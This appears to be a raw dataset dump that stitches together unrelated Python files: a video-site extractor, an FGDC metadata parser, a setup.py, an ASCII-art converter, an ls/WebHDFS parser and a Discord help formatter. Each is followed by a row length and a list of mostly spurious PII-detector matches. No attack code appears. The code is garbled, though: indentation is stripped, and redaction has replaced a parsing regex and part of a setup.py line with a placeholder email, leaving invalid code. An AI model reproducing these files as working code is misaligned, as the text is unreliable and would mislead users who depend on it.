sub_domain, video_id, display_id = re.match(self._VALID_URL, url).groups()
if not video_id:
webpage = self._download_webpage(url, display_id)
video_id = self._search_regex(
# There may be inner quotes, e.g. data-video-id="'VDKA3609139'"
# from http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood
r'data-video-id=["\']*VDKA(\w+)', webpage, 'video id')
site_info = self._SITE_INFO[sub_domain]
brand = site_info['brand']
video_data = self._download_json(
'http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json' % (brand, video_id),
video_id)['video'][0]
title = video_data['title']
formats = []
for asset in video_data.get('assets', {}).get('asset', []):
asset_url = asset.get('value')
if not asset_url:
continue
format_id = asset.get('format')
ext = determine_ext(asset_url)
if ext == 'm3u8':
video_type = video_data.get('type')
data = {
'video_id': video_data['id'],
'video_type': video_type,
'brand': brand,
'device': '001',
}
if video_data.get('accesslevel') == '1':
requestor_id = site_info['requestor_id']
resource = self._get_mvpd_resource(
requestor_id, title, video_id, None)
auth = self._extract_mvpd_auth(
url, video_id, requestor_id, resource)
data.update({
'token': auth,
'token_type': 'ap',
'adobe_requestor_id': requestor_id,
})
else:
self._initialize_geo_bypass(['US'])
entitlement = self._download_json(
'https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json',
video_id, data=urlencode_postdata(data), headers=self.geo_verification_headers())
errors = entitlement.get('errors', {}).get('errors', [])
if errors:
for error in errors:
if error.get('code') == 1002:
self.raise_geo_restricted(
error['message'], countries=['US'])
error_message = ', '.join([error['message'] for error in errors])
raise ExtractorError('%s said: %s' % (self.IE_NAME, error_message), expected=True)
asset_url += '?' + entitlement['uplynkData']['sessionKey']
formats.extend(self._extract_m3u8_formats(
asset_url, video_id, 'mp4', m3u8_id=format_id or 'hls', fatal=False))
else:
f = {
'format_id': format_id,
'url': asset_url,
'ext': ext,
}
if re.search(r'(?:/mp4/source/|_source\.mp4)', asset_url):
f.update({
'format_id': ('%s-' % format_id if format_id else '') + 'SOURCE',
'preference': 1,
})
else:
mobj = re.search(r'/(\d+)x(\d+)/', asset_url)
if mobj:
height = int(mobj.group(2))
f.update({
'format_id': ('%s-' % format_id if format_id else '') + '%dP' % height,
'width': int(mobj.group(1)),
'height': height,
})
formats.append(f)
self._sort_formats(formats)
subtitles = {}
for cc in video_data.get('closedcaption', {}).get('src', []):
cc_url = cc.get('value')
if not cc_url:
continue
ext = determine_ext(cc_url)
if ext == 'xml':
ext = 'ttml'
subtitles.setdefault(cc.get('lang'), []).append({
'url': cc_url,
'ext': ext,
})
thumbnails = []
for thumbnail in video_data.get('thumbnails', {}).get('thumbnail', []):
thumbnail_url = thumbnail.get('value')
if not thumbnail_url:
continue
thumbnails.append({
'url': thumbnail_url,
'width': int_or_none(thumbnail.get('width')),
'height': int_or_none(thumbnail.get('height')),
})
return {
'id': video_id,
'title': title,
'description': video_data.get('longdescription') or video_data.get('description'),
'duration': int_or_none(video_data.get('duration', {}).get('value'), 1000),
'age_limit': parse_age_limit(video_data.get('tvrating', {}).get('rating')),
'episode_number': int_or_none(video_data.get('episodenumber')),
'series': video_data.get('show', {}).get('title'),
'season_number': int_or_none(video_data.get('season', {}).get('num')),
'thumbnails': thumbnails,
'formats': formats,
'subtitles': subtitles,
}
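
# Hedged sketch of how _VALID_URL decomposes a page URL (the URL below is
# illustrative, not a real video):
#
#     import re
#     m = re.match(GoIE._VALID_URL, 'http://abc.go.com/shows/some-show/video/vdka1234567')
#     m.group('sub_domain'), m.group('id'), m.group('display_id')
#     # -> ('abc', '1234567', None)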
| 6,904 | [['MEDICAL_LICENSE', 'ka3335601'], ['URL', "http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601',"], ['LOCATION', '.adobepass'], ['LOCATION', 'video_id, display_id ='], ['URL', 're.ma'], ['URL', 'asset.ge'], ['URL', 'self.ge'], ['URL', 're.se'], ['PERSON', "mobj = re.search(r'/(\\d+)x(\\d+)/'"], ['URL', 'cc.ge'], ['URL', 'thumbnail.ge'], ['URL', 'thumbnail.ge'], ['PERSON', "int_or_none(video_data.get('season"], ['URL', 'http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood'], ['URL', "http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json'"], ['URL', "https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json',"], ['URL', 'INFO.ke'], ['URL', 'data.ge'], ['URL', 'asset.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'entitlement.ge'], ['URL', 'error.ge'], ['URL', 'self.IE'], ['URL', 're.se'], ['URL', 'mobj.gr'], ['URL', 'mobj.gr'], ['URL', 'data.ge'], ['URL', 'subtitles.se'], ['URL', 'cc.ge'], ['URL', 'data.ge'], ['URL', 'thumbnail.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge']] |
54 | # -*- coding: ISO-8859-15 -*-
# =============================================================================
# Copyright (c) 2010 Tom Kralidis
#
# Authors : Tom Kralidis dummy@email.com
#
# Contact email: dummy@email.com
# =============================================================================
""" FGDC metadata parser """
from __future__ import (absolute_import, division, print_function)
from owscapable.etree import etree
from owscapable import util
class Metadata(object):
""" Process metadata """
def __init__(self, md):
if hasattr(md, 'getroot'): # standalone document
self.xml = etree.tostring(md.getroot())
else: # part of a larger document
self.xml = etree.tostring(md)
self.idinfo = Idinfo(md)
self.eainfo = Eainfo(md)
self.distinfo = Distinfo(md)
self.metainfo = Metainfo(md)
if self.idinfo.datasetid:
self.identifier = self.idinfo.datasetid
class Idinfo(object):
""" Process idinfo """
def __init__(self, md):
val = md.find('idinfo/datasetid')
self.datasetid = util.testXMLValue(val)
val = md.find('idinfo/citation')
self.citation = Citation(val)
val = md.find('idinfo/descript')
if val is not None:
self.descript = Descript(val)
val = md.find('idinfo/timeperd')
self.timeperd = Timeperd(val)
val = md.find('idinfo/status')
if val is not None:
self.status = Status(val)
val = md.find('idinfo/spdom')
if val is not None:
self.spdom = Spdom(val)
val = md.find('idinfo/keywords')
if val is not None:
self.keywords = Keywords(val)
val = md.find('idinfo/accconst')
self.accconst = util.testXMLValue(val)
val = md.find('idinfo/useconst')
self.useconst = util.testXMLValue(val)
val = md.find('idinfo/ptcontac')
if val is not None:
self.ptcontac = Ptcontac(val)
val = md.find('idinfo/datacred')
self.datacred = util.testXMLValue(val)
val = md.find('idinfo/crossref')
self.crossref = Citation(val)
class Citation(object):
""" Process citation """
def __init__(self, md):
if md is not None:
self.citeinfo = {}
val = md.find('citeinfo/origin')
self.citeinfo['origin'] = util.testXMLValue(val)
val = md.find('citeinfo/pubdate')
self.citeinfo['pubdate'] = util.testXMLValue(val)
val = md.find('citeinfo/title')
self.citeinfo['title'] = util.testXMLValue(val)
val = md.find('citeinfo/geoform')
self.citeinfo['geoform'] = util.testXMLValue(val)
val = md.find('citeinfo/pubinfo/pubplace')
self.citeinfo['pubplace'] = util.testXMLValue(val)
val = md.find('citeinfo/pubinfo/publish')
self.citeinfo['publish'] = util.testXMLValue(val)
self.citeinfo['onlink'] = []
for link in md.findall('citeinfo/onlink'):
self.citeinfo['onlink'].append(util.testXMLValue(link))
class Descript(object):
""" Process descript """
def __init__(self, md):
val = md.find('abstract')
self.abstract = util.testXMLValue(val)
val = md.find('purpose')
self.purpose = util.testXMLValue(val)
val = md.find('supplinf')
self.supplinf = util.testXMLValue(val)
class Timeperd(object):
""" Process timeperd """
def __init__(self, md):
if md is not None:
val = md.find('current')
self.current = util.testXMLValue(val)
val = md.find('timeinfo')
if val is not None:
self.timeinfo = Timeinfo(val)
class Timeinfo(object):
""" Process timeinfo """
def __init__(self, md):
val = md.find('sngdate')
if val is not None:
self.sngdate = Sngdate(val)
val = md.find('rngdates')
if val is not None:
self.rngdates = Rngdates(val)
class Sngdate(object):
""" Process sngdate """
def __init__(self, md):
val = md.find('caldate')
self.caldate = util.testXMLValue(val)
val = md.find('time')
self.time = util.testXMLValue(val)
class Rngdates(object):
""" Process rngdates """
def __init__(self, md):
val = md.find('begdate')
self.begdate = util.testXMLValue(val)
val = md.find('begtime')
self.begtime = util.testXMLValue(val)
val = md.find('enddate')
self.enddate = util.testXMLValue(val)
val = md.find('endtime')
self.endtime = util.testXMLValue(val)
class Status(object):
""" Process status """
def __init__(self, md):
val = md.find('progress')
self.progress = util.testXMLValue(val)
val = md.find('update')
self.update = util.testXMLValue(val)
class Spdom(object):
""" Process spdom """
def __init__(self, md):
val = md.find('bounding/westbc')
self.westbc = util.testXMLValue(val)
val = md.find('bounding/eastbc')
self.eastbc = util.testXMLValue(val)
val = md.find('bounding/northbc')
self.northbc = util.testXMLValue(val)
val = md.find('bounding/southbc')
self.southbc = util.testXMLValue(val)
if (self.southbc is not None and self.northbc is not None and
self.eastbc is not None and self.westbc is not None):
self.bbox = Bbox(self)
class Bbox(object):
""" Generate bbox for spdom (convenience function) """
def __init__(self, spdom):
self.minx = spdom.westbc
self.miny = spdom.southbc
self.maxx = spdom.eastbc
self.maxy = spdom.northbc
class Keywords(object):
""" Process keywords """
def __init__(self, md):
self.theme = []
self.place = []
self.temporal = []
for i in md.findall('theme'):
theme = {}
val = i.find('themekt')
theme['themekt'] = util.testXMLValue(val)
theme['themekey'] = []
for j in i.findall('themekey'):
themekey = util.testXMLValue(j)
if themekey is not None:
theme['themekey'].append(themekey)
self.theme.append(theme)
for i in md.findall('place'):
theme = {}
place = {}
val = i.find('placekt')
theme['placekt'] = util.testXMLValue(val)
theme['placekey'] = []
for j in i.findall('placekey'):
theme['placekey'].append(util.testXMLValue(j))
self.place.append(place)
for i in md.findall('temporal'):
theme = {}
temporal = {}
val = i.find('tempkt')
theme['tempkt'] = util.testXMLValue(val)
theme['tempkey'] = []
for j in i.findall('tempkey'):
theme['tempkey'].append(util.testXMLValue(j))
self.temporal.append(temporal)
class Ptcontac(object):
""" Process ptcontac """
def __init__(self, md):
val = md.find('cntinfo/cntorgp/cntorg')
self.cntorg = util.testXMLValue(val)
val = md.find('cntinfo/cntorgp/cntper')
self.cntper = util.testXMLValue(val)
val = md.find('cntinfo/cntpos')
self.cntpos = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/addrtype')
self.addrtype = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/address')
self.address = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/city')
self.city = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/state')
self.state = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/postal')
self.postal = util.testXMLValue(val)
val = md.find('cntinfo/cntaddr/country')
self.country = util.testXMLValue(val)
val = md.find('cntinfo/cntvoice')
self.voice = util.testXMLValue(val)
val = md.find('cntinfo/cntemail')
self.email = util.testXMLValue(val)
class Eainfo(object):
""" Process eainfo """
def __init__(self, md):
val = md.find('eainfo/detailed/enttyp/enttypl')
self.enttypl = util.testXMLValue(val)
val = md.find('eainfo/detailed/enttyp/enttypd')
self.enttypd = util.testXMLValue(val)
val = md.find('eainfo/detailed/enttyp/enttypds')
self.enttypds = util.testXMLValue(val)
self.attr = []
for i in md.findall('eainfo/detailed/attr'):
attr = {}
val = i.find('attrlabl')
attr['attrlabl'] = util.testXMLValue(val)
val = i.find('attrdef')
attr['attrdef'] = util.testXMLValue(val)
val = i.find('attrdefs')
attr['attrdefs'] = util.testXMLValue(val)
val = i.find('attrdomv/udom')
attr['udom'] = util.testXMLValue(val)
self.attr.append(attr)
class Distinfo(object):
""" Process distinfo """
def __init__(self, md):
val = md.find('distinfo')
if val is not None:
val2 = val.find('stdorder')
if val2 is not None:
self.stdorder = {'digform': []}
for link in val2.findall('digform'):
digform = {}
digform['name'] = util.testXMLValue(link.find('digtinfo/formname'))
digform['url'] = util.testXMLValue(link.find('digtopt/onlinopt/computer/networka/networkr/'))
self.stdorder['digform'].append(digform)
class Metainfo(object):
""" Process metainfo """
def __init__(self, md):
val = md.find('metainfo/metd')
self.metd = util.testXMLValue(val)
val = md.find('metainfo/metrd')
self.metrd = util.testXMLValue(val)
val = md.find('metainfo/metc')
if val is not None:
self.metc = Ptcontac(val)
val = md.find('metainfo/metstdn')
self.metstdn = util.testXMLValue(val)
val = md.find('metainfo/metstdv')
self.metstdv = util.testXMLValue(val)
val = md.find('metainfo/metac')
self.metac = util.testXMLValue(val)
val = md.find('metainfo/metuc')
self.metuc = util.testXMLValue(val)
| 10,441 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['PERSON', 'Tom Kralidis'], ['PERSON', 'Tom Kralidis dummy@email.com'], ['PERSON', 'md):'], ['PERSON', 'md):\n val'], ['PERSON', 'self.timeperd = Timeperd(val'], ['PERSON', 'md):\n '], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n '], ['PERSON', 'md):\n val'], ['PERSON', "md.find('sngdate"], ['PERSON', 'md):\n val'], ['PERSON', "md.find('caldate"], ['PERSON', 'self.time = util.testXMLValue(val'], ['PERSON', 'md):\n val'], ['PERSON', "md.find('begdate"], ['PERSON', "md.find('begtime"], ['PERSON', "md.find('enddate"], ['PERSON', 'md):\n val'], ['PERSON', "md.find('update"], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n val'], ['PERSON', 'self.enttypd ='], ['PERSON', 'md):\n val'], ['URL', 'val2.fi'], ['URL', 'link.fi'], ['URL', 'link.fi'], ['PERSON', 'md):\n val'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'owscapable.et'], ['URL', 'etree.to'], ['URL', 'md.ge'], ['URL', 'etree.to'], ['URL', 'self.id'], ['URL', 'self.me'], ['URL', 'self.id'], ['URL', 'self.id'], ['URL', 'self.id'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.de'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ke'], ['URL', 'md.fi'], ['URL', 'self.ac'], ['URL', 'md.fi'], ['URL', 'self.us'], ['URL', 'md.fi'], ['URL', 'self.pt'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.cr'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.su'], ['URL', 'md.fi'], ['URL', 'self.cu'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.sn'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ca'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.be'], ['URL', 'md.fi'], ['URL', 'self.be'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.pro'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.no'], ['URL', 'md.fi'], ['URL', 'self.so'], ['URL', 'self.so'], ['URL', 'self.no'], ['URL', 'self.bb'], ['URL', 'spdom.so'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'spdom.no'], ['URL', 'self.th'], ['URL', 'self.pl'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.th'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.pl'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.ad'], ['URL', 'md.fi'], ['URL', 'self.ad'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.co'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.at'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.at'], ['URL', 'md.fi'], ['URL', 'val.fi'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 
'self.me'], ['URL', 'md.fi'], ['URL', 'self.me']] |
55 | import sys
from setuptools import setup
tests_require = ["nose>=1.0"]
if sys.version_info < (3,0):
tests_require = ["nose>=1.0", "mock"]
setup(
name="unitils",
version="0.1.2",
author="iLoveTux",
dummy@email.com",
description="Cross platform utilities I have found to be incredibly useful",
license="GPLv3",
keywords="utility tools cli",
url="http://github.com/ilovetux/unitils",
packages=['unitils'],
install_requires=["colorama"],
entry_points={
"console_scripts": [
"cat.py=unitils.cli:cat",
"cp.py=unitils.cli:cp",
"find.py=unitils.cli:find",
"grep.py=unitils.cli:grep",
"head.py=unitils.cli:head",
"ls.py=unitils.cli:ls",
"mv.py=unitils.cli:mv",
"watch.py=unitils.cli:watch",
"wc.py=unitils.cli:wc",
"which.py=unitils.cli:which",
]
},
test_suite="nose.collector",
tests_require=tests_require,
classifiers=[
"Development Status :: 4 - Beta",
"Topic :: Utilities",
"License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
],
)
| 1,171 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'GPLv3'], ['URL', 'http://github.com/ilovetux/unitils",'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'sys.ve'], ['URL', 'email.com'], ['URL', 'cat.py'], ['URL', 'unitils.cl'], ['URL', 'cp.py'], ['URL', 'unitils.cl'], ['URL', 'find.py'], ['URL', 'unitils.cl'], ['URL', 'grep.py'], ['URL', 'unitils.cl'], ['URL', 'head.py'], ['URL', 'unitils.cl'], ['URL', 'ls.py'], ['URL', 'unitils.cl'], ['URL', 'mv.py'], ['URL', 'unitils.cl'], ['URL', 'watch.py'], ['URL', 'unitils.cl'], ['URL', 'wc.py'], ['URL', 'unitils.cl'], ['URL', 'which.py'], ['URL', 'unitils.cl'], ['URL', 'nose.co']] |
56 | #!/usr/bin/env python
# asciinator.py
#
# Copyright 2014 Christian Diener dummy@email.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
from __future__ import print_function # for python2 compat
import sys
from PIL import Image
import numpy as np
# ascii chars sorted by "density"
chars = np.asarray(list(' .,:;irsXA253hMHGS#9B&@'))
# check command line arguments
if len(sys.argv) != 4:
print( 'Usage: asciinator.py image scale factor' )
sys.exit()
# set basic program parameters
# f = filename, SC = scale, GCF = gamma correction factor, WCF = width correction factor
f, SC, GCF, WCF = sys.argv[1], float(sys.argv[2]), float(sys.argv[3]), 7.0/4.0
# open, scale and normalize image by pixel intensities
img = Image.open(f)
S = (int(img.size[0]*SC*WCF), int(img.size[1]*SC))
img = np.sum( np.asarray(img.resize(S), dtype="float"), axis=2)
img -= img.min()
img = (1.0 - img/img.max())**GCF*(chars.size-1)
# Assemble and print ascii art
print( "\n".join(("".join(r) for r in chars[img.astype(int)])))
print()
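# Hedged usage note (editor's addition): with a hypothetical input file, an
# invocation might look like
#   ./asciinator.py photo.jpg 0.1 1.5
# where 0.1 scales the image to 10% and GCF=1.5 is the gamma correction;
# a GCF above 1 biases mid-tones toward the lighter end of `chars`.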
| 1,717 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Christian Diener'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['LOCATION', 'SC'], ['LOCATION', 'SC'], ['URL', 'asciinator.py'], ['URL', 'email.com'], ['URL', 'np.as'], ['URL', 'sys.ar'], ['URL', 'asciinator.py'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'img.si'], ['URL', 'img.si'], ['URL', 'np.su'], ['URL', 'np.as'], ['URL', 'img.re'], ['URL', 'img.ma'], ['URL', 'chars.si'], ['URL', 'img.as']] |
57 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import datetime
from time import strptime
import re
import os
import json
class FileStatus(object):
def __init__(self, path, rights, nbFiles, owner, group, size, date, relpath = None):
self.path = path
self.rights = rights
self.nbFiles = nbFiles
self.owner = owner
self.group = group
self.size = size
self.date = date
self.relpath = relpath
def __eq__(self, other):
return (self.path == other.path and self.rights == other.rights and
self.nbFiles == other.nbFiles and self.owner == other.owner and self.group == other.group and
self.size == other.size and self.date == other.date)
def is_dir(self):
return self.rights.startswith("d")
def __str__(self):
return self.to_str(0, 0, 0, 0, 0, 0, 0)
    def to_str(self, rights_width, nbFiles_width, owner_width, group_width, size_width, date_width, path_width):
        if self.is_dir():
            nb_files = "-"
        else:
            nb_files = str(self.nbFiles)
        result = "%s %s %s %s %s %s %s" % (self.rights.ljust(rights_width),
                                           nb_files.ljust(nbFiles_width),
                                           self.owner.ljust(owner_width),
                                           self.group.ljust(group_width),
                                           str(self.size).ljust(size_width),
                                           self.date.strftime("%Y-%m-%d %H:%M").ljust(date_width),
                                           self.path.ljust(path_width))
return result.encode("utf-8")
def get_file_statuses_pretty_print(file_statuses):
rights_width = 0
nb_files_width = 0
owner_width = 0
group_width = 0
size_width = 0
date_width = 0
path_width = 0
if len(file_statuses) != 0:
rights_width = max([len(fs.rights) for fs in file_statuses])
nb_files_width = max([len(str(fs.nbFiles)) for fs in file_statuses])
owner_width = max([len(fs.owner) for fs in file_statuses])
group_width = max([len(fs.group) for fs in file_statuses])
size_width = max([len(str(fs.size)) for fs in file_statuses])
        date_width = max([len(fs.date.strftime("%Y-%m-%d %H:%M")) for fs in file_statuses])
path_width = max([len(fs.path) for fs in file_statuses])
result = []
for file_status in file_statuses:
result.append(file_status.to_str(rights_width, nb_files_width, owner_width, group_width, size_width, date_width, path_width))
return "\n".join(result)
class LsParser(object):
def __init__(self):
pass
def parse_line(self, line):
regex = "^(dummy@email.com)$"
m = re.match(regex, line, re.UNICODE)
if m is None:
return None
rights = m.group(1)
nbFiles = int(m.group(2))
owner = m.group(3)
group = m.group(4)
size = int(m.group(5))
day = int(m.group(6))
month = m.group(7)
try:
month = strptime(month, '%b').tm_mon
except:
month = [u"jan", u"fév", u"mar", u"avr", u"mai", u"jui", u"juil", u"aoû", u"sep", u"oct", u"nov", u"déc"].index(month) + 1
try:
year = int(m.group(8))
except:
year = datetime.datetime.now().year
filename = m.group(9)
date = datetime.date(year, month, day)
return FileStatus(filename, rights, nbFiles, owner, group, size, date)
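    # Editor's notes (added): the original pattern above was redacted; from the
    # group usage it must expose nine groups in order: rights, nbFiles, owner,
    # group, size, day, month, year and filename. Month names are resolved via
    # strptime first ('Mar' -> 3) and fall back to the French abbreviation
    # list, e.g. u'fév' -> 2 and u'aoû' -> 8.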
def parse(self, output):
result = [self.parse_line(line) for line in output.split("\n")]
return [p for p in result if p is not None]
class WebHdfsParser(object):
def __init__(self, path):
self.path = path
def permissions_to_unix_name(self, is_dir, rights):
is_dir_prefix = 'd' if is_dir else '-'
sticky = False
if len(rights) == 4 and rights[0] == '1':
sticky = True
rights = rights[1:]
dic = {'7': 'rwx', '6': 'rw-', '5': 'r-x', '4': 'r--', '3': '-wx', '2': '-w-', '1': '--x', '0': '---'}
result = is_dir_prefix + ''.join(dic[x] for x in rights)
if sticky:
result = result[:-1] + "t"
return result
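    # Worked examples (editor's addition) for the octal-to-rwx conversion:
    #   permissions_to_unix_name(True, '755')   -> 'drwxr-xr-x'
    #   permissions_to_unix_name(False, '1644') -> '-rw-r--r-t'  (sticky bit)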
def parse_status(self, status):
relpath = status["pathSuffix"]
path = os.path.join(self.path, relpath)
nbFiles = 0
size = status["length"]
owner = status["owner"]
group = status["group"]
is_dir = status["type"] == "DIRECTORY"
right_digits = status["permission"]
rights = self.permissions_to_unix_name(is_dir, right_digits)
parsed_date = datetime.datetime.utcfromtimestamp(int(status["modificationTime"])/1000)
date = datetime.datetime(parsed_date.year, parsed_date.month, parsed_date.day, parsed_date.hour, parsed_date.minute)
return FileStatus(path, rights, nbFiles, owner, group, size, date, relpath)
def parse(self, output):
try:
j = json.loads(output)
except:
print output
return []
if "FileStatuses" not in j or "FileStatus" not in j["FileStatuses"]:
print j
return []
statuses = j["FileStatuses"]["FileStatus"]
result = []
for status in statuses:
result.append(self.parse_status(status))
return result
| 5,405 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'other.nbFiles'], ['PERSON', 'self.owner == other.owner'], ['NRP', 'self.rights.ljust(rights_width'], ['LOCATION', 'self.date.strftime("%Y-%M-%d'], ['NRP', 'owner_width'], ['LOCATION', 'owner_width'], ['DATE_TIME', 'month'], ['DATE_TIME', 'parsed_date.day'], ['URL', 'self.pa'], ['URL', 'self.gr'], ['URL', 'self.si'], ['URL', 'self.re'], ['URL', 'self.pa'], ['URL', 'other.pa'], ['URL', 'self.gr'], ['URL', 'other.gr'], ['URL', 'self.si'], ['URL', 'other.si'], ['URL', 'self.rights.st'], ['URL', 'self.to'], ['URL', 'self.is'], ['URL', 'self.gr'], ['URL', 'self.si'], ['URL', 'self.date.st'], ['URL', 'self.pa'], ['URL', 'fs.gr'], ['URL', 'fs.si'], ['URL', 'fs.date.st'], ['URL', 'fs.pa'], ['URL', 'status.to'], ['URL', 'email.com'], ['URL', 're.ma'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'datetime.datetime.no'], ['URL', 'm.gr'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'os.path.jo'], ['URL', 'self.pa'], ['URL', 'self.pe'], ['URL', 'date.ye'], ['URL', 'date.mo'], ['URL', 'self.pa']] |
58 | # coding=utf-8
"""Overrides for Discord.py classes"""
import contextlib
import inspect
import io
import itertools
import re
import discord
from discord.ext.commands import HelpFormatter as HelpF, Paginator, Command
from bot.utils import polr, privatebin
from bot.utils.args import ArgParseConverter as ArgPC
def create_help(cmd, parser):
"""Creates an updated usage for the help command"""
default = cmd.params['args'].default
if cmd.signature.split("[")[-1] == f"args={default}]" if default else "args]":
sio = io.StringIO()
with contextlib.redirect_stdout(sio):
parser.print_help()
sio.seek(0)
s = sio.read()
# Strip the filename and trailing newline from help text
arg_part = s[(len(str(s[7:]).split()[0]) + 8):-1]
k = cmd.qualified_name
spt = len(k.split())
# Remove a duplicate command name + leading arguments
split_sig = cmd.signature.split()[spt:]
return "[".join((" ".join(split_sig)).split("[")[:-1]) + arg_part
return cmd.usage
class HelpFormatter(HelpF):
"""Custom override for the default help command"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._paginator = None
async def format(self):
"""Handles the actual behaviour involved with formatting.
To change the behaviour, this method should be overridden.
Returns
--------
list
A paginated output of the help command.
"""
self._paginator = Paginator()
# we need a padding of ~80 or so
description = self.command.description if not self.is_cog() else inspect.getdoc(self.command)
if description:
# <description> portion
self._paginator.add_line(description, empty=True)
if isinstance(self.command, Command):
# <signature portion>
if self.command.params.get("args", None) and type(self.command.params['args'].annotation) == ArgPC:
self.command.usage = create_help(self.command, self.command.params['args'].annotation.parser)
signature = self.get_command_signature()
self._paginator.add_line(signature, empty=True)
# <long doc> section
if self.command.help:
self._paginator.add_line(self.command.help, empty=True)
# end it here if it's just a regular command
if not self.has_subcommands():
self._paginator.close_page()
return self._paginator.pages
max_width = self.max_name_size
def category(tup):
"""Splits the help command into categories for easier readability"""
cog = tup[1].cog_name
# we insert the zero width space there to give it approximate
# last place sorting position.
return cog + ':' if cog is not None else '\u200bNo Category:'
filtered = await self.filter_command_list()
if self.is_bot():
data = sorted(filtered, key=category)
for category, commands in itertools.groupby(data, key=category):
# there simply is no prettier way of doing this.
commands = sorted(commands)
if len(commands) > 0:
self._paginator.add_line(category)
self._add_subcommands_to_page(max_width, commands)
else:
filtered = sorted(filtered)
if filtered:
self._paginator.add_line('Commands:')
self._add_subcommands_to_page(max_width, filtered)
# add the ending note
self._paginator.add_line()
ending_note = self.get_ending_note()
self._paginator.add_line(ending_note)
return self._paginator.pages
_mentions_transforms = {
'@everyone': '@\u200beveryone',
'@here': '@\u200bhere'
}
_mention_pattern = re.compile('|'.join(_mentions_transforms.keys()))
def _is_submodule(parent, child):
return parent == child or child.startswith(parent + ".")
async def _default_help_command(ctx, *commands: str):
